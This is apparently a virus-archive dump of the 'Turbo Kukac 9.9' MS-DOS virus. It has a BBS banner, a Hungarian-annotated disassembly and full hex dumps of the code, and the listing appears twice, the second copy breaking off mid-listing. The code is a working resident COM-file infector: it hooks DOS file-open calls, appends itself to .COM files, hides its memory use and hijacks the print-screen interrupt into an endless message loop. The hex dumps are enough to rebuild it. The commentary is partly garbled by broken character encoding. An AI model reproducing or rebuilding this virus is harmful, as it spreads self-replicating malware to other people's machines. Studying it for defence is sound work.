0EB0:0230 43 00 B0 E9 2E A2 80 02-B0 05 2E A2 83 02 B9 04 C...............
0EB0:0240 00 BA 80 02 0E 1F B4 40-E8 2A 00 B8 02 42 B9 00 .......@.*...B..
0EB0:0250 00 8B D1 E8 1F 00 BA 00-01 B9 C0 01 B4 40 E8 14 .............@..
0EB0:0260 00 B4 3E E8 0F 00 5E 5F-5A 59 5B 58 07 1F 90 2E ..>...^_ZY[X....
0EB0:0270 FF 2E 7C 02 CF 9C 2E FF-1E 7C 02 C3 16 13 0C 02 ..|......|......
0EB0:0280 E9 1C 00 05 01 01 EB 12-90 49 00 01 DD 0A 0A 0D .........I......
0EB0:0290 9A 64 76 20 6D 69 6E 64-65 6E 20 6E 61 67 79 74 .dv minden nagyt
0EB0:02A0 75 64 A0 73 A3 6E 61 6B-21 20 54 75 72 62 6F 20 ud.s.nak! Turbo
0EB0:02B0 40 20 2E 2E 2E 20 2E 2E-2E 20 1A 00 00 00 00 00 @ ... ... ......
0EB0:02C0 53 74 20 E8 4E 01 E9 51-FF 2E C6 06 05 00 06 2E St .N..Q........
0EB0:02D0 C7 06 09 00 10 00 EB 7B-90 2E C7 06 09 00 0A 00 .......{........
0EB0:02E0 EB 71 90 2E FE 06 06 00-56 8B F3 83 C3 02 3E 8B .q......V.....>.
0EB0:02F0 72 02 2E 80 3E 06 00 00-75 0A AC 3C 00 74 3B E8 r...>...u..<.t;.
0EB0:0300 0F .


426
MSDOS/Virus.MSDOS.Unknown.turbo99.asm Normal file
View File

@ -0,0 +1,426 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
TURBO KUKAC v9.9 virus unassembled list:
`90.07.21.
Magyar zat: Kv ri L szl˘
Tel.: (41) 21-822 07-13:20 mh.
21-033 18:00-
28F8:0100 E80000 CALL 0103 ;IP rtke az SI-be
28F8:0103 90 NOP ;ez lesz a b zis offset
28F8:0104 5E POP SI
28F8:0105 50 PUSH AX
28F8:0106 51 PUSH CX
28F8:0107 B021 MOV AL,21
28F8:0109 B435 MOV AH,35
28F8:010B CD21 INT 21 ;INT 21h cˇmnek lekr-
;dezse
28F8:010D 8CC0 MOV AX,ES
28F8:010F 3D0040 CMP AX,4000 ;a mem˘ri ban van ?
28F8:0112 7224 JB 0138 ;nincs!
28F8:0114 83EE03 SUB SI,+03 ;b zis offset -3
;(3 byte hosszu a JMP
;+ az operandusa!)
28F8:0117 BAC102 MOV DX,02C1
28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levon sa
;(COM file saj toss ga!)
28F8:011E 03F2 ADD SI,DX
28F8:0120 8B1C MOV BX,[SI] ;JMP k˘dja + az operan-
;dus fele
28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte
28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet
28F8:0129 890E0201 MOV [0102],CX ;let rol sa
28F8:012D 8CD8 MOV AX,DS
28F8:012F 8EC0 MOV ES,AX ;ES=DS
28F8:0131 59 POP CX
28F8:0132 58 POP AX
28F8:0133 BB0001 MOV BX,0100 ;ugr s offset-je
28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM V<>GRE-
;HAJTŹSA
;HA M<>G NINCS A MEM˘RIŹBAN
28F8:0138 8CD8 MOV AX,DS ;saj t szegmense
28F8:013A 48 DEC AX ;saj t seg-1= MCB. seg.
28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense
28F8:013D A10300 MOV AX,[0003] ;DOS  lltal a programnak
;foglalt mem˘riablokk
;hossza
28F8:0140 2D4100 SUB AX,0041 ;virus hossz t levonja
;bel”le (41*16 byte)
28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS
; lltal l tott teljes
;mem˘ria nagys ga a prg.
;kilpse ut n (41*16
;byte-tal) kevesebb lesz
;Hasonl˘an csin lja ezt
;a YANKEE DOODLE is, s
;ezzel azt ri el, hogy
;semmilyen
;System Storage Map
;programmal nem mutat-
;hat˘ ki a virus jele-
;lte a mem˘ri ban!
;A PCTOOLS system info
;kimutatja, azaz csak
;annyit l tni, hogy a
;fizikai RAM mret 640K
;s a DOS  lltal l tott
;az 639k byte! Igy k”-
;vetkeztetni lehet...
28F8:0146 8CC8 MOV AX,CS
28F8:0148 8ED8 MOV DS,AX ;DS=CS
28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej-
;nek a paragrafuscˇme
28F8:014D 2D0008 SUB AX,0800
28F8:0150 8EC0 MOV ES,AX ;virus Łj szegmense
28F8:0152 BF0001 MOV DI,0100
28F8:0155 83EE03 SUB SI,+03
28F8:0158 B90002 MOV CX,0200 ;virus hossza
28F8:015B F3 REPZ
28F8:015C A4 MOVSB ;virus m sol sa az Łj
;szegmensbe
28F8:015D 8C06C702 MOV [02C7],ES ;Łj szegmens t rol sa
28F8:0161 B96C01 MOV CX,016C ;belpsi pont
28F8:0164 890EC502 MOV [02C5],CX ;t rol sa
28F8:0168 FF2EC502 JMP FAR [02C5] ;ugr s az Łj szegmens
;01c6 offset-re
;UJ SZEGMENSBEN A BEL<45>P<EFBFBD>SI PONT
28F8:016C 8CC1 MOV CX,ES
28F8:016E 8CD8 MOV AX,DS ;ahonnan m solta mag t
28F8:0170 26 ES:
28F8:0171 A3CB02 MOV [02CB],AX ;R<>GI PRG. segment cˇm
28F8:0174 B80001 MOV AX,0100
28F8:0177 26 ES:
28F8:0178 A3C902 MOV [02C9],AX ;0100h offset t rol sa
28F8:017B 8CC0 MOV AX,ES
28F8:017D 8ED8 MOV DS,AX
28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY Łj
;offset-je
28F8:0182 B005 MOV AL,05
28F8:0184 B425 MOV AH,25
28F8:0186 CD21 INT 21 ;INT 05 ellop sa
28F8:0188 B435 MOV AH,35
28F8:018A B021 MOV AL,21
28F8:018C CD21 INT 21 ;INT 21h cˇm lekrdez-
;se
28F8:018E 2E CS:
28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (rgi)
28F8:0193 8CC3 MOV BX,ES
28F8:0195 2E CS:
28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (rgi)
28F8:019A B8D901 MOV AX,01D9 ;Łj INT 21h offset cˇm
28F8:019D 8BD0 MOV DX,AX
28F8:019F 8BC1 MOV AX,CX
28F8:01A1 8ED8 MOV DS,AX
28F8:01A3 B021 MOV AL,21
28F8:01A5 B425 MOV AH,25
28F8:01A7 CD21 INT 21 ;INT 21h ellop sa
28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ
28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!!
28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!!
28F8:01B4 8ED8 MOV DS,AX
28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP k˘dja
28F8:01BA 890E0201 MOV [0102],CX ;s operandusa
28F8:01BE 8EC0 MOV ES,AX
28F8:01C0 59 POP CX
28F8:01C1 58 POP AX
28F8:01C2 2E CS:
28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA-
;TŹSA!
;Łj INT 05 - HARD COPY rutin
28F8:01C7 90 NOP
28F8:01C8 50 PUSH AX
28F8:01C9 1E PUSH DS
28F8:01CA 52 PUSH DX
28F8:01CB 8CC8 MOV AX,CS
28F8:01CD 8ED8 MOV DS,AX
;V<>GTELEN CIKLUS!
28F8:01CF BACE02 MOV DX,02CE ;sz”veg kezdete
;Turbo Kukac v9.9
28F8:01D2 B409 MOV AH,09 ;print string
28F8:01D4 E8D900 CALL 02B0 ;rgi INT 21h hiv sa
28F8:01D7 EBF6 JMP 01CF ;Łjra!
;Łj INT 21h rutin
28F8:01D9 90 NOP
28F8:01DA 80FC3D CMP AH,3D ;file nyit sa alfunkci˘?
28F8:01DD 7403 JZ 01E2 ;igen
28F8:01DF E9C700 JMP 02A9 ;nem ugr sa az eredeti
;INT 21h-ra
28F8:01E2 90 NOP
28F8:01E3 1E PUSH DS
28F8:01E4 06 PUSH ES
28F8:01E5 50 PUSH AX
28F8:01E6 53 PUSH BX
28F8:01E7 51 PUSH CX
28F8:01E8 52 PUSH DX
28F8:01E9 57 PUSH DI
28F8:01EA 56 PUSH SI
;File kiterjeszts ellen”rzse
28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete
28F8:01ED 8CDE MOV SI,DS
28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH
; tvtele!)
28F8:01F1 B000 MOV AL,00 ;PATH lez r˘ nulla
28F8:01F3 B93200 MOV CX,0032 ;file secifik ci˘ hossza
28F8:01F6 FC CLD ;el”re
28F8:01F7 F2 REPNZ
28F8:01F8 AE SCASB ;PATH lez r˘ 0 byte ke-
;resse
28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszts
;kezdet+1 pozici˘ra mu-
;tat
28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be
28F8:01FF 26 ES:
28F8:0200 3B05 CMP AX,[DI] ; 'OM' a vge ?
28F8:0202 7403 JZ 0207 ;igen val szin<69>leg COM
;file
28F8:0204 E99A00 JMP 02A1 ;nem COM ugr s az erede-
;ti INT 21h-ra
28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be
28F8:020A 26 ES:
28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ?
28F8:020E 7403 JZ 0213 ;biztos hogy COM file!
28F8:0210 E98E00 JMP 02A1 ;nem COM ugr s az erede-
;ti INT 21h-ra
;File nyit sa
28F8:0213 B43D MOV AH,3D ;file nyit s
28F8:0215 B002 MOV AL,02 ;ˇr s/olvas s
28F8:0217 E89600 CALL 02B0 ;INT 21h hiv sa
28F8:021A 7303 JNB 021F ;ha nincs hiba
28F8:021C E98200 JMP 02A1 ;hiba esetn ugr s az
;eredeti INT 21h-ra
28F8:021F 8BD8 MOV BX,AX ;file kezel”
;File mret ellen”rzs
28F8:0221 B90000 MOV CX,0000
28F8:0224 BA0000 MOV DX,0000
28F8:0227 B002 MOV AL,02 ;file vgre
28F8:0229 B442 MOV AH,42 ;file pointer mozgat sa
28F8:022B E88200 CALL 02B0 ;INT 21h hiv sa
28F8:022E 3D00FE CMP AX,FE00
28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file
;65024 byte-n l
28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza
;Fert”zend” file eredeti 4 byte j nak
;beolvas sa
28F8:0236 2E CS:
28F8:0237 A3BE02 MOV [02BE],AX ;let rolja
28F8:023A B442 MOV AH,42 ;file pointer mozgat sa
28F8:023C B000 MOV AL,00 ;file elejre
28F8:023E B90000 MOV CX,0000
28F8:0241 BA0000 MOV DX,0000
28F8:0244 E86900 CALL 02B0 ;INT 21h hiv sa
28F8:0247 B43F MOV AH,3F ;olvas s file-b˘l
28F8:0249 B90400 MOV CX,0004 ;4 byte
28F8:024C BAC102 MOV DX,02C1 ;ide tegye
28F8:024F 8CCF MOV DI,CS
28F8:0251 8EDF MOV DS,DI ;DS=CS
28F8:0253 E85A00 CALL 02B0 ;INT 21h hiv sa
28F8:0256 B005 MOV AL,05
28F8:0258 3A06C402 CMP AL,[02C4] ;utols˘ byte=5 ?
28F8:025C 7443 JZ 02A1 ;igen, ugr s az eredeti
;INT 21h -ra
;Fert”zend” file-ba a virusra
;mutat˘ JMP+op. kiˇr sa (4 byte)
28F8:025E B442 MOV AH,42 ;file pointer mozgat sa
28F8:0260 B000 MOV AL,00 ;file elejre
28F8:0262 B90000 MOV CX,0000
28F8:0265 8BD1 MOV DX,CX
28F8:0267 E84600 CALL 02B0 ;INT 21h hiv sa
28F8:026A B0E9 MOV AL,E9 ;JMP k˘dja
28F8:026C 2E CS:
28F8:026D A2BD02 MOV [02BD],AL ;let rolja
28F8:0270 B005 MOV AL,05
28F8:0272 2E CS:
28F8:0273 A2C002 MOV [02C0],AL
28F8:0276 B90400 MOV CX,0004 ;4 byte
28F8:0279 BABD02 MOV DX,02BD ;JMP + op. kezdete
28F8:027C 8CC8 MOV AX,CS
28F8:027E 8ED8 MOV DS,AX
28F8:0280 B440 MOV AH,40 ;kiˇr s file-ba
28F8:0282 E82B00 CALL 02B0 ;INT 21h hiv sa
;Program megfert”zse 0200h byte kiˇr sa
;azaz a virus m”gm sol sa
28F8:0285 B442 MOV AH,42 ;file pointer mozgat sa
28F8:0287 B002 MOV AL,02 ;file vgre
28F8:0289 B90000 MOV CX,0000
28F8:028C 8BD1 MOV DX,CX
28F8:028E E81F00 CALL 02B0 ;INT 21h hiv sa
28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-t”l
28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza
28F8:0297 B440 MOV AH,40 ;kiˇr s file-ba
28F8:0299 E81400 CALL 02B0 ;INT 21h hiv sa
28F8:029C B43E MOV AH,3E ;file z r sa
28F8:029E E80F00 CALL 02B0 ;INT 21h hiv sa
28F8:02A1 5E POP SI
28F8:02A2 5F POP DI
28F8:02A3 5A POP DX
28F8:02A4 59 POP CX
28F8:02A5 5B POP BX
28F8:02A6 58 POP AX
28F8:02A7 07 POP ES
28F8:02A8 1F POP DS
28F8:02A9 90 NOP
28F8:02AA 2E CS:
28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra
28F8:02AF CF IRET
;Eredeti INT 21h hiv sa
28F8:02B0 9C PUSHF ;elmenti mivel az IRET
;visszamenti a flag-eket
28F8:02B1 2E CS:
28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hiv sa
28F8:02B6 C3 RET
28F8:02B7 16 PUSH SS
28F8:02B8 130C ADC CX,[SI]
28F8:02BA 0202 ADD AL,[BP+SI]
28F8:02BC 00E9 ADD CL,CH
28F8:02BE 06 PUSH ES
28F8:02BF 06 PUSH ES
28F8:02C0 05E906 ADD AX,06E9
28F8:02C3 0405 ADD AL,05
28F8:02C5 0100 ADD [BX+SI],AX
28F8:02C7 0000 ADD [BX+SI],AL
28F8:02C9 0001 ADD [BX+DI],AL
28F8:02CB F0 LOCK
28F8:02CC 0901 OR [BX+DI],AX
28F8:02CE 54 PUSH SP
28F8:02CF 7572 JNZ 0343
28F8:02D1 62 DB 62
28F8:02D2 6F DB 6F
28F8:02D3 204B75 AND [BP+DI+75],CL
28F8:02D6 6B DB 6B
28F8:02D7 61 DB 61
28F8:02D8 63 DB 63
28F8:02D9 2039 AND [BX+DI],BH
28F8:02DB 2E CS:
28F8:02DC 3920 CMP [BX+SI],SP
28F8:02DE 2020 AND [BX+SI],AH
28F8:02E0 2020 AND [BX+SI],AH
28F8:02E2 2024 AND [SI],AH
28F8:02E4 0000 ADD [BX+SI],AL
28F8:02FC 0000 ADD [BX+SI],AL
28F8:02FE FA CLI
28F8:02FF 00C7 ADD BH,AL
Megjegyzs:
Nagyon primitˇv virus, de megvan a maga zsenialit sa, kt legyet
<EFBFBD>t egy csap sra, pl COPY parancs esetn megnyit egy com file-t,s
ha a virus a mem˘ri ban van, akkor mg a m soland˘ file-t megfer-
tzi, s a COPY m r a fertztt file-t m solja! Nem igaz n k r-
tkony vˇrus, puszt n minden<EFBFBD>tt ott akar lenni, s nehezˇteni a
felhaszn l˘(k) munk j t! Mrete nagyon kicsi, mindssze 512 byte!
Hi nyoznak a vˇrusb˘l az (tapasztalataim szerint) eddigi virusok-
ban fellelhet ellenrzsek, gondolok itt arra, hogy ha megtrtnik
egy file-ba (hoz) val˘ kiˇr s nem ellenrzi a program hogy val˘ban
kiˇrta-e azt az X byte-ot. Tov bb  mikor rezidess (nem {hivatalo-
san} bejegyzetten) teszi mag t nem m˘dosˇtja az MCB. 13. byte-j n
lv RAM tetejnek a paragrafus cˇmtt a saj t maga  lltal lefog-
lalt mrettel (kivon s!), mint PL. a Yankee Doodle! A Yankee mg
azt is megnzi, hogy amit meg akar fertzni az az utols˘ mem˘.
blokkban van-e, b r abban kell lennie, mert a DOS egy programnak
odaadja a teljes szabad mem˘ri t, ami van...
DUMP:
28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..=
28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............
28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............
28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H.....
28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-..
28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................
28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l.............
28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........
28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!..
28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................
28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!.......
28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................
28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R.....
28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t..
28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV.....
28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM&
28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t.
28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s.....
28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=.
28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B....
28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?.......
28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B
28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F.......
28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................
28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B.........
28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>..
28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X.........
28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................
28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 ..............
;Kiˇrand˘ sz”veg kezdete
28F8:02C0 54 75 Tu
28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9
28F8:02E0 20 20 20 24 $
28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............
28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................
28F8:0300 C7 .
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;

426
MSDOS/Virus.MSDOS.Unknown.turbo99.lst Normal file
View File

@ -0,0 +1,426 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
TURBO KUKAC v9.9 virus unassembled list:
`90.07.21.
Magyar zat: K”v ri L szl˘
Tel.: (41) 21-822 07-13:20 mh.
21-033 18:00-
28F8:0100 E80000 CALL 0103 ;IP rtke az SI-be
28F8:0103 90 NOP ;ez lesz a b zis offset
28F8:0104 5E POP SI
28F8:0105 50 PUSH AX
28F8:0106 51 PUSH CX
28F8:0107 B021 MOV AL,21
28F8:0109 B435 MOV AH,35
28F8:010B CD21 INT 21 ;INT 21h cˇmnek lekr-
;dezse
28F8:010D 8CC0 MOV AX,ES
28F8:010F 3D0040 CMP AX,4000 ;a mem˘ri ban van ?
28F8:0112 7224 JB 0138 ;nincs!
28F8:0114 83EE03 SUB SI,+03 ;b zis offset -3
;(3 byte hosszu a JMP
;+ az operandusa!)
28F8:0117 BAC102 MOV DX,02C1
28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levon sa
;(COM file saj toss ga!)
28F8:011E 03F2 ADD SI,DX
28F8:0120 8B1C MOV BX,[SI] ;JMP k˘dja + az operan-
;dus fele
28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte
28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet
28F8:0129 890E0201 MOV [0102],CX ;let rol sa
28F8:012D 8CD8 MOV AX,DS
28F8:012F 8EC0 MOV ES,AX ;ES=DS
28F8:0131 59 POP CX
28F8:0132 58 POP AX
28F8:0133 BB0001 MOV BX,0100 ;ugr s offset-je
28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM V<>GRE-
;HAJTŹSA
;HA M<>G NINCS A MEM˘RIŹBAN
28F8:0138 8CD8 MOV AX,DS ;saj t szegmense
28F8:013A 48 DEC AX ;saj t seg-1= MCB. seg.
28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense
28F8:013D A10300 MOV AX,[0003] ;DOS  lltal a programnak
;foglalt mem˘riablokk
;hossza
28F8:0140 2D4100 SUB AX,0041 ;virus hossz t levonja
;bel”le (41*16 byte)
28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS
; lltal l tott teljes
;mem˘ria nagys ga a prg.
;kilpse ut n (41*16
;byte-tal) kevesebb lesz
;Hasonl˘an csin lja ezt
;a YANKEE DOODLE is, s
;ezzel azt ri el, hogy
;semmilyen
;System Storage Map
;programmal nem mutat-
;hat˘ ki a virus jele-
;lte a mem˘ri ban!
;A PCTOOLS system info
;kimutatja, azaz csak
;annyit l tni, hogy a
;fizikai RAM mret 640K
;s a DOS  lltal l tott
;az 639k byte! Igy k”-
;vetkeztetni lehet...
28F8:0146 8CC8 MOV AX,CS
28F8:0148 8ED8 MOV DS,AX ;DS=CS
28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej-
;nek a paragrafuscˇme
28F8:014D 2D0008 SUB AX,0800
28F8:0150 8EC0 MOV ES,AX ;virus Łj szegmense
28F8:0152 BF0001 MOV DI,0100
28F8:0155 83EE03 SUB SI,+03
28F8:0158 B90002 MOV CX,0200 ;virus hossza
28F8:015B F3 REPZ
28F8:015C A4 MOVSB ;virus m sol sa az Łj
;szegmensbe
28F8:015D 8C06C702 MOV [02C7],ES ;Łj szegmens t rol sa
28F8:0161 B96C01 MOV CX,016C ;belpsi pont
28F8:0164 890EC502 MOV [02C5],CX ;t rol sa
28F8:0168 FF2EC502 JMP FAR [02C5] ;ugr s az Łj szegmens
;01c6 offset-re
;UJ SZEGMENSBEN A BEL<45>P<EFBFBD>SI PONT
28F8:016C 8CC1 MOV CX,ES
28F8:016E 8CD8 MOV AX,DS ;ahonnan m solta mag t
28F8:0170 26 ES:
28F8:0171 A3CB02 MOV [02CB],AX ;R<>GI PRG. segment cˇm
28F8:0174 B80001 MOV AX,0100
28F8:0177 26 ES:
28F8:0178 A3C902 MOV [02C9],AX ;0100h offset t rol sa
28F8:017B 8CC0 MOV AX,ES
28F8:017D 8ED8 MOV DS,AX
28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY Łj
;offset-je
28F8:0182 B005 MOV AL,05
28F8:0184 B425 MOV AH,25
28F8:0186 CD21 INT 21 ;INT 05 ellop sa
28F8:0188 B435 MOV AH,35
28F8:018A B021 MOV AL,21
28F8:018C CD21 INT 21 ;INT 21h cˇm lekrdez-
;se
28F8:018E 2E CS:
28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (rgi)
28F8:0193 8CC3 MOV BX,ES
28F8:0195 2E CS:
28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (rgi)
28F8:019A B8D901 MOV AX,01D9 ;Łj INT 21h offset cˇm
28F8:019D 8BD0 MOV DX,AX
28F8:019F 8BC1 MOV AX,CX
28F8:01A1 8ED8 MOV DS,AX
28F8:01A3 B021 MOV AL,21
28F8:01A5 B425 MOV AH,25
28F8:01A7 CD21 INT 21 ;INT 21h ellop sa
28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ
28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!!
28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!!
28F8:01B4 8ED8 MOV DS,AX
28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP k˘dja
28F8:01BA 890E0201 MOV [0102],CX ;s operandusa
28F8:01BE 8EC0 MOV ES,AX
28F8:01C0 59 POP CX
28F8:01C1 58 POP AX
28F8:01C2 2E CS:
28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA-
;TŹSA!
;Łj INT 05 - HARD COPY rutin
28F8:01C7 90 NOP
28F8:01C8 50 PUSH AX
28F8:01C9 1E PUSH DS
28F8:01CA 52 PUSH DX
28F8:01CB 8CC8 MOV AX,CS
28F8:01CD 8ED8 MOV DS,AX
;V<>GTELEN CIKLUS!
28F8:01CF BACE02 MOV DX,02CE ;sz”veg kezdete
;Turbo Kukac v9.9
28F8:01D2 B409 MOV AH,09 ;print string
28F8:01D4 E8D900 CALL 02B0 ;rgi INT 21h hiv sa
28F8:01D7 EBF6 JMP 01CF ;Łjra!
;Łj INT 21h rutin
28F8:01D9 90 NOP
28F8:01DA 80FC3D CMP AH,3D ;file nyit sa alfunkci˘?
28F8:01DD 7403 JZ 01E2 ;igen
28F8:01DF E9C700 JMP 02A9 ;nem ugr sa az eredeti
;INT 21h-ra
28F8:01E2 90 NOP
28F8:01E3 1E PUSH DS
28F8:01E4 06 PUSH ES
28F8:01E5 50 PUSH AX
28F8:01E6 53 PUSH BX
28F8:01E7 51 PUSH CX
28F8:01E8 52 PUSH DX
28F8:01E9 57 PUSH DI
28F8:01EA 56 PUSH SI
;File kiterjeszts ellen”rzse
28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete
28F8:01ED 8CDE MOV SI,DS
28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH
; tvtele!)
28F8:01F1 B000 MOV AL,00 ;PATH lez r˘ nulla
28F8:01F3 B93200 MOV CX,0032 ;file secifik ci˘ hossza
28F8:01F6 FC CLD ;el”re
28F8:01F7 F2 REPNZ
28F8:01F8 AE SCASB ;PATH lez r˘ 0 byte ke-
;resse
28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszts
;kezdet+1 pozici˘ra mu-
;tat
28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be
28F8:01FF 26 ES:
28F8:0200 3B05 CMP AX,[DI] ; 'OM' a vge ?
28F8:0202 7403 JZ 0207 ;igen val szin<69>leg COM
;file
28F8:0204 E99A00 JMP 02A1 ;nem COM ugr s az erede-
;ti INT 21h-ra
28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be
